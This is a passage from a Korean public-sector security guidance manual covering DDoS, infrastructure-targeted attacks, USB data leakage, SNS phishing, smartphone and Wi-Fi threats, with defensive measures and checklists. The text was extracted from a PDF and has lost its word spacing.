침입방지시스템등정보보호시스템에서차단하고관리자비밀번호는분기별로 1회이상변경사용 o 악성코드감염등사이버침해사고발생시조치사항숙지 - 217 -
- 218 -
[ 보안강화체크리스트 ] o 개인 PC 보안강화 o 전산망및시스템보안강화 - 219 -
2. 조직적이고지능화된 DDoS 공격 [ 공격유형 ] o 네트워크대역폭공격 - 다수의 PC를이용하영대용량의트래픽을전송함으로써대상웹서버의대역폭처리한계를초과시켜마비시키는공격 [ 네트워크대역폭공격 ] o 시스템자원고갈공격 - 다수의 PC가짧은시간동안반복적으로웹서버에접속을요청함으로써대상웹서버의 CPU 및메모리과부하유발 [ 시스템자원고갈공격 ] - 인터넷에서사용하는 TCP(3-way Handshaking) 의특성을악용하여네트워크연결을위한 H/W 자원고갈 - 웹서버에서동작하는응용프로그램의취약점을악용하여웹서버또는 DB서버의자원을고갈시켜정상동작을방해 - 220 -
[ 보안강화대책 ] o 보안담당관, 당직자등 DDoS 대응요령숙지 o 전산망유입트래픽모니터링강화 교육과학기술부 DDoS 공격대응실무매뉴얼 제 6 장 1 절 DDoS 공격모니터링기 술 참조 - 221 -
[DDoS 공격징후탐지 ] o 네트워크장비보안정책설정최적화 - 라우터 스위치등네트워크장비에공격 IP 등록하여차단 교육과학기술부 DDoS 공격대응실무매뉴얼 제6장 2절 네트워크장비설정방법 참조 - 침입차단 침입방지시스템, DDoS 대응장비등정보보호시스템의설정값은도입시설정한초기임계값이아닌각급기관상황 ( 평시대역폭, 웹서버성능, 평시세션개수등 ) 에맞춰자체시험한임계값으로재설정 DDoS 대응장비및정보보호시스템차단룰은최신업데이트유지 - 싱크홀 (Sink-hole) 라우팅또는블랙홀 (Black-hole) 라우팅을적용하여공격대상서버를목적지로하는패킷들을우회시키거나해외혹은외부 AS(Autonomous System) 에서유입되는트래픽을차단 DDoS 공격대응은신속히이루어져야하므로라우터설정변경대응이지연될경우 ISP와협조하여차단 - 222 -
[ 싱크홀라우팅 ( 전체트래픽을우회시켜공격트래픽만차단 ), 블랙홀라우팅 ( 유입되는공격대역의 IP 전체차단 ) ] o 웹서버운영환경설정최적화및방어시스템구축 - 시스템자원을고갈시키는 DDoS 공격에대응하기위해서운영중인웹서버환경변수를최 적화 교육과학기술부 DDoS 공격대응실무매뉴얼 제 6 장 2 절 서버설정방법 참조 각급기관에서운영중인웹서버의성능및접속대역폭등에따라가변적이므로자 체시험후해당기관에맞는적절한값으로설정 [ 윈도우 (Windows) 서버설정사례 ] - 223 -
[ 솔라리스 (Solaris) 서버설정사례 ] [ 리눅스 (Linux) 서버설정사례 ] - 홈페이지 URL Redirection 등공격트래픽우회기법을적극활용하여 DDoS 공격방어 URL Redirection 구축방법 DDoS 공격이발생하여서비스거부현상이발견되는경우, 좀비 PC가웹서버로부터의응답을처리하지않는특징을이용하여 DDoS 공격대상 URL을다른페이지로 Redirection 되도록구성 [ 별도웹서버를이용한 URL Redirection] - 224 -
기관별준비사항 1 Redirection 용서버 ( 유휴서버및다수의 PC로도구성가능 ) 웹서버하나에서 Index 페이지만새로작성 운영할경우서버는불필요 2 Redirection 안내페이지 (HTML) 사전작성 o DDoS 비상대응체계강화 - 평시 DDoS 방어장비 침입방지시스템등정보보호시스템에최신탐지룰업데이트하고, 탐지및차단로그에대한주기적점검수행 네트워크 서버 정보보호시스템 OS에대한최신업데이트유지 - DDoS 공격징후탐지시긴급대응반을가동하고정부통합전산센터등유관기관, 유지보수업체, ISP 업체와 24시간비상연락체계유지 교육과학기술부 DDoS 공격대응실무매뉴얼 제 2장 1절 DDoS 공격대응절차 참조하여최신의비상연락체계유지 - DDoS 공격발생시보안담당자는 DDoS 대응장비등에설정된공격트래픽탐지 차단임계치하양조정 - 기관내네트워크담당자는라우터등네트워크장비설정변경을통한공격트래픽우회및차단 - 네트워크대역폭을초과하는공격트래픽유입시 ISP 협조를통해대역폭증설, 해외유입트래픽차단 - 225 -
[ 보안강화체크리스트 ] o DDoS 공격징후탐지및초동대응 o DDoS 비상대응체계강화 - 226 -
3. 국가주요기반시설을겨냥한표적화 (Targeted) 공격 [ 공격유형 ] o 제로데이 공개취약점이용악성코드제작 유포, USB 매모리등휴대용저장매체를통한폐쇄망침투 o 제어시스템명령코드조작으로발전 전력 화학등의국가주요기반시설시스템오작동유발 o 국가주요기반시설자동제어시스템에저장된기밀정보를 USB 메모리등휴대용저장매체를이용하여외부로유출 [ 원자력발전자동제어시스템을목표로제작된스턱스넷 (Stuxnet) 공격과정 ] [ 보안강화대책 ] o 인터넷 업무망등에서제어망으로의침투가능성점검 - 제어망 ( 폐쇄망 ) 을운영하는기관은제어망내 USB 포트를봉인하는등사용통제 - 제어망은외부망과연결을차단한폐쇄망으로운용하되, 연결이불가피할경우일방향전송방식 ( 제어망 외부망 ) 으로연결 국가기반시설전자제어시스템보안가이드라인 ( 국가사이버안전센터, 10.4 월 ) 제3장 2절 안전한네트워크연동 참조 - 227 -
- 시스템유지보수및관리의편의성을위해설치된원격관리서비스 ( 텔넷, 터미널서비스 등 ) 제거 [ 원격연결기능비활성화 ] - 인터넷 업무망및제어망내시스템공유폴터 공유프린터사용금지 1 시작 실행 'fsmgmt.msc' 입력 [ 공유폴더창열기 ] - 228 -
2 공유폴더및공유프린터공유중지 [ 공유폴더사용기능해제 ] o USB 사용통제및 USB 내악성코드자동실행차단 - 제어시스템의 USB포트봉인등악성코드유입경로차단하고사용시에는인가된저장매체만을사용 사용전반드시최신업데이트된백신을통해웜 바이러스감염여부확인 - 국가사이버안전센터에서배포한 ( 07.12) 한 'USB Guard' 를이용, USB 자동실행을통한웜 바이러스감염예방 o 불필요한서비스제거 - 제어시스템운용에필요한서비스는사전에사용목적, 전송되는자료등에대하여구체적으로파악하고운용과상관없는서비스는제거 - 229 -
[ 보안강화체크리스트 ] o USB 포트통제및원격관리 공유폴더사용금지 - 230 -
4. 내 외부직원에의한기밀자료유출 [ 기밀유출유형 ] o 비인가 USB 메모리무단사용에의한기밀자료유출 o 업무 PC에스마트폰 ADSL 무선공유기등비인가인터넷연결시악성코드에의한기밀자료유출 o 인터넷 원격업무 PC의해킹또는악성코드감염, 스마트폰 USB 메모리등의분실에의한기밀자료유출 o 정보화사업등외부용역사업추진시전산망구성도 IP 주소등대외비자료유출 [ 비인가인터넷, USB 메모리등에의한자료유출 ] [ 보안강화대책 ] o USB를통한자료반 출입통제강화 - 등록된 USB 메모리의개인소지를금지하고 USB 반출 입허용기간은출장기간등사용목적에따라최소기간으로한정하여승인 교육과학기술부정보보안기본지침 제39 조제8 항, 'USB 메모리등휴대용저장매체보안관리지침 ' 참조 - 자료반출 입승인권자 ( 정보보안담당자 ) 는사용자가반출 입요청한자료목록확인및보안성검토확행, 업무상목적이외의중요자료반출사전차단 - 231 -
- 외국정부등외부기관으로부터 USB 를통해자료를제공받은경우최신백신 S/W를이용하여악성코드감염여부확인후사용 o USB 메모리등휴대용저장매체사용및관리실태일제점검 - USB 메모리등휴대용저장매체는일반 비밀용 ( 대외비포함 ) 으로구분, 휴대용저장매체관리대장에등록후사용하고주기적으로분실여부및보관상태를확인 점검 ( 월1 회 ) - 각급기관에등록된휴대용저장매체를사용하여업무자료를보관할필요가있을때에는위변조, 훼손, 분실등에대비한보안대책을강구 - USB 저장자료는파일단위로비밀번호를설정, 분실및유출에대비 - 망분리기관은망간자료전송시 USB를대체할일방향전송장비등을활용한안전한업무망 인터넷자료전송체계구축권고 국가 공공기관업무망과인터넷간안전한자료전송가이드라인 ( 국가사이버안전센터 10.8 월 ) 참조 - 각급기관의휴대용저장매체는각팀장 과장책임하에관리하는것을원칙으로하며미등록휴대용저장매체를사용하거나허가없이반출하지않도록지도 감독철저 o USB 무단반출 입등보안규정위반으로인한사고시엄중문책 - USB 메모리등휴대용저장매체를통한보안사고유발시중요자료대량유출등파급영향에대한교육주기적실시, 경각심제고 - USB 무단반출 입등보안관련규정위반으로인한보안사고시 ' 공무원징계령 ' 등관련법령엄격적용, 보안기강확립 o 비밀문서작성시안전한 PC 이용 - 비밀작성시인터넷연동 PC에서작업을금지하며비밀문서작업전용오프라인 PC를확보하여사용 - 업무망과인터넷을완전분리한기관은업무망 PC에서비밀작업가능 o 비밀문서파일은필요시 USB에저장및비밀로관리 - 비밀생산과정중 ( 미완성비밀 ) 또는비밀생산후파일활용이필요한경우별도휴대용저장매체인 USB에저장할수있으며, 이경우 USB를비밀로분류 관리 USB를비밀등급별로구분, 분류하여비밀캐비닛에보관관리하고 USB에동일등급의여러비밀을함께보관하는것은가능하나 USB의비밀목록은반드시유지 - 개인 PC에비밀문서파일의저장 보관을금지하며비밀작업이허용된업무망 PC에서도비밀문서파일저장금지 - 다만, 기관장요청에의해국정원장이승인한암호장비 (NEU-02R) 를설치, 파일암호화가가능한업무망 PC는비밀작업은물론저장 보관도가능 이경우업무망 PC 내독립된폴더를지정하여비밀문서파일만보관하고, 비밀폴더에저장된암호화된비밀문서파일은어떤경우든 USB 등에평문저장이불가해 - 232 -
야함 o 수기결재및직접접촉에의해수발 - 작성된비밀은전자결재를금지하고반드시지면에출력하여수기결재 - 비밀수발은전산망에의한전자적유통이불가하므로등기 문취수발등인편에의한직접수발을원칙으로함 - 다만, 국정원장이승인한비밀관리시스템, FAX 암호장비 (NX-02R) 등국가용보안시스템을설치한경우는전자적유통가능 o 공직자개인 PC 내보관비밀자료일제삭제 - 각급기관은자체캠페인을전개, 개인 PC 내보관중인비밀자료를일제삭제조치하고, 매월 ' 사이버보안잔단의날 ' 행사시 PC 내비밀보관여부자체점검확행 기존개인 PC 내무단보관중인비밀은개인별로 ' 윈도우파일검색 ' 또는 ' 한글문서찾기 ' 를활용하여검색 삭제 - 비인가통신망사용을금지하는공지사항전직원통보 o 민원실등외부인사용네트워크보안강화 - 인터넷검색실은독립적으로 ADSL 등을이용하여구축하는것이원칙이나, 기관네트워크에연동하여구성하는경우독립적인서브네트워크로구축하고정보보호시스템을이용한탐지 차단정책적용 안전한정보통신환경구현을위한네트워크구축가이드라인, ( 국가사이버안전센터, 09.6 월 ) 제3장 7절민원인을위한인터넷검색실운용참조 o 기관내직원명의도용방지강화 - 타직원의계정을탈취하여업무포털에로그인한후자료를절취할수없도록사용자접근기록관리철저내부직원명의도용방지대책 - 233 -
o 원격근무보안관리강화 - 각급기관의장은원격근무가능업무및공개 비공개업무선정기준을수립하고, 대외비이상의비밀자료를취급하는업무는원격근무대상에서원칙적으로제외 반드시수행해야하는경우, 보안대책강구후국정원장과협의하여수행여부결정 - 각급기관의장은원격근무자에게업무변경 인사이동 퇴직등상황발생시정보시스템접근권한재설정등관련절차수립및이행 - 원격근무시스템은자료유출방지시스템, 공인인증서를활용한사용자인증적용등을통해보안을강화 - 원격근무시해킹을통한업무자료유출을방지하기위하여작업수행전최신백신으로원격근무용 PC 점검 업무자료저장금지등보안조치를수행 - 원격근무자는정보시스템고장시정보유출방지등보안대책을강구한후정보보안담당관과협의하여정비 반납등조치이행 - 비공개원격업무인경우에는국가용보안시스템을사용하여소통자료를암호화하고행정전자서명체계를이용하여인증하며인증강화를위하여일회용비밀번호 생체인증등보안기술사용 - 정보보안담당관은주기적인보안점검을실시하며원격근무보안대책의이행여부확인 o 정보화사업추진등외부용역업체보안관리강화 - 각급기관은정보화 정보보호사업및보안컨설팅수행등외부용역으로추진되는사업에대하여보안대책을수립 시행 교육과학기술부정보보안기본지침 제 58조 ' 용역사업보안관리 ' 항목참조 - 각급기관용역사업추진시 ( 입찰공고포함 ) 정보보호제품도입현황, 전산망구성도등민간자료홈페이지게재금지 - 용경업체인터넷연결 PC에전산망구성도 IP 주소현황등개발 유지보수관련자료보관여부점검 - 사업종료후관련제반자료및사업산출물등을일체보관하지않는다는대표명의확약서징구 국가 공공기관발주용역사업보안관리요령 ( 국가사이버안전센터, 07.10 월 ), 정부정보화사업용역업체보안관리강화대책 ( 09.6 월 ) 준수 - 234 -
[ 보안강화체크리스트 ] o USB 사용통제강화 o 비밀자료관리강화 - 235 -
o 외부인력 통신망통제강화 - 236 -
o 원격근무자료유출통제강화 - 237 -
5. SNS( 소셜네트워크서비스 ) 를악용한다양한공격 [ 공격유형 ] o 단축홈페이지 URL 을이용피싱사이트유도및악성코드감염 [ 검색순위 URL 조작을통한악성코드감염 ] o 국가 공공기관기밀자료절취목적의 SNS 표적화 (Target) 공격 [SNS 친구를사칭한표적화공격 ] - 238 -
[ 보안강화대책 ] o 단축홈페이지 URL 위 변조여부확인강화 - 공격자는피싱 악성홈페이지 URL 을단축 URL 서비스를이용하여위 변조후 SNS( 트위터 페이스북등 ) 에게시하여사용자감염을유도 트위터는짧고간결한메시지소통을위해입력글자수를 140자로제한 단축 URL 서비스는긴 URL 주소를짧게줄여주는기능을제공하지만, 이과정에서홈페이지주소가변경되어원래의 URL 주소를직관적으로알수없는위험성내포 [ 단축 URL을이용한위 변조예시 ] - 사용자는단축 URL 에접근하기전, 원래의 URL 을보여주는서비스를활용하여위 변조여부확인후접근 오리지널 URL 확인사이트 : http://expandmyurl.com, http://longurlplease.com, http://longurl.org 등 [ 단축 URL 을위 변조여부점검 ] o 개인정보및계정 ( 아이디 비밀번호 ) 관리강화 - 개인정보 직업 친구등인적네트워크를활용한공격이예상되는정보는 SNS( 트위터 페이스북 네이트온등 ) 게시금지 - 국가공공기관에서사용하는 SNS 관리자계정은문자 숫자 특수문자를혼합한 9자리이상의비밀번호를설정하고주기적으로변경 ( 분기 1회 ) o 각급기관은인가된 SNS( 소셜네트워크서비스 ) 만사용 - 239 -
- 유해한 SNS 주소 ( 피실서버 악성코드유포사이트 명령제어서버 URL) 및 IP 를침입탐지 침입방 지시스템등정보보호시스템탐지룰에적용시켜접속을차단하고, 탐지룰최신업데이 트유지 - 240 -
[ 보안강화체크리스트 ] o SNS 사용통제강화 - 241 -
6. 스미트폰등모바일기기대상보안위협 [ 스마트폰보안위협 ] o 스마트폰등모바일기기분실 탈취를통한자료유출 o 악성코드감염을통한자료탈취, 음성도청, 위치추적 o 업무부서와연결가능한모바일기기를악용하여업무망침투 - 다수의 PC를이용하여대용량의트래픽을전송함으로써대상웹 [ 스마트폰등모바일악성코드이용자료절취및내부망침투 ] [ 보안강화대책 ] o 스마트폰업무시스템도입시사업계획단계부터국가정보원의보안성검토수행 o 스마트폰을활용한업무시스템도입시소통자료의중요도에따른보안요구사항준수 국가 공공기관업무용스마트폰보안규격 ( 국가사이버안전센터, 10.5 월 ) o 스마트폰분실 도난에의한자료유출피해최소화 - 스마트폰구동시비밀번호에의한사용자인증을수행하도록설정하고일정시간미사용시잠금기능수행 - 242 -
스마트폰비밀번호관리요령 - 스마트폰분실 도난에대비하여원격삭제프로그램사전설치 운용 o 스마트폰등모바일악성코드감염예방 - 스마트폰, 태블릿 PC 등모바일기기의운영체제 (OS) 를최신버전으로업데이트하고플랫폼구조변경금지 Jail-breaking 등과같은해킹을통해플랫폼구조를변경하는경우보안에취약 - 스마트폰제조사또는백신업체에서제공하는모바일기기용최신백신프로그램을설치하고주기적으로정밀검사 [2010년주요스마트폰악성코드사례 ] - 인터넷이용시의심스러운파일은다운로드하지않거나백신 S/W 를이용하여검사후실행 - 스마트폰으로 P2P, 게임, 웹하드등사용자제 - 단축 URL 이포함된메시지및메일수신시 URL 미리보기기능을통해위 변조여부사전점검 - 243 -
스마트폰이용자안전수칙 - 244 -
[ 보안강화체크리스트 ] o SNS 사용통제강화 - 245 -
o 스마트폰관리적보안강화 - 246 -
7. 무선랜 (Wi-Fi) 도청을통한정보절취 [ 무선랜 (Wi-Fi) 보안위협 ] o 무선패킷스니핑을통한시스템접속계정정보 ( 아이디 / 비밀번호 ) 등송 수신데이터탈취 o 비인가 AP를설치하여접속사용자의피싱사이트유도후악성코드감염및계정정보탈취 o 무선랜 AP 해킹에의한관리자권한탈취 [ 비인가 AP 의패킷스니핑을통한자료절취및악성코드감염 ] [ 보안강화대책 ] o 무선랜 (Wi-Fi) 은민원실 교육장등에서제한된용도로사용권고 o 비인가 AP 자동접근차단설정 - 무선랜 (Wi-Fi) 기능은필요시에만활성화하여사용하고인가된 AP에만접속하여사용 - [ 시작 - 제어판 - 네트워크연결 - 무선네트워크연결속성 ] 선택후불필요한무선네트워크삭제 - 247 -
[ 불필요무선네트워크확인및삭제 ] - 사용하는무선네트워크에대해서는자동연결기능해제 [ 무선네트워크자동연결기능해제 ] - 248 -
o 무선랜사용시보안관리강화 - 무선랜사용보안대책에대한보안성검토승인후사용 교육과학기술부정보보안기본지침 제 46조 ' 무선랜보안관리 ' 참조 - 무선랜시스템은물리적으로안전한곳에설치하고보안정책에의한출입통제및관리책임자를지정하여운용 - 무선 AP 설정은관리자 PC(IP MAC) 에서만접근가능하도록설정 운용 - 네트워크이름 (SSID) 브로드캐스팅기능을중지하고숨김모드기능을사용하여인가된사용자만이정해진 SSID 를사용할수있도록조치 무선랜을사용하는기관의이름이나부서를추측할수있는값으로설정하지않고장비명을추측할수없도록복잡한 SSID 사용 - 무선 AP에연결된비인가사용자존재여부주기적확인 [ 무선 AP에연결된 PC의 IP/MAC 정보 ] - 무선 AP와사용자간소통자료는 WPA2 이상 (256 비트 ) 의암호체계를사용하여암호화 - 사전허가된사용자의 IP MAC 주소에대해서만무선 AP 사용을허용하도록설정, DHCP 사용금지 - 각급기관은무선랜사용시 RADIUS(Remote Authentication Dial-In User Service) 사용자인증방식등을사용하여비인가접근차단 - 무선 AP 관리자암호설정및주기적변경 - 249 -
[ 무선 AP 관리자설정이되어있지않은화면 ] - 250 -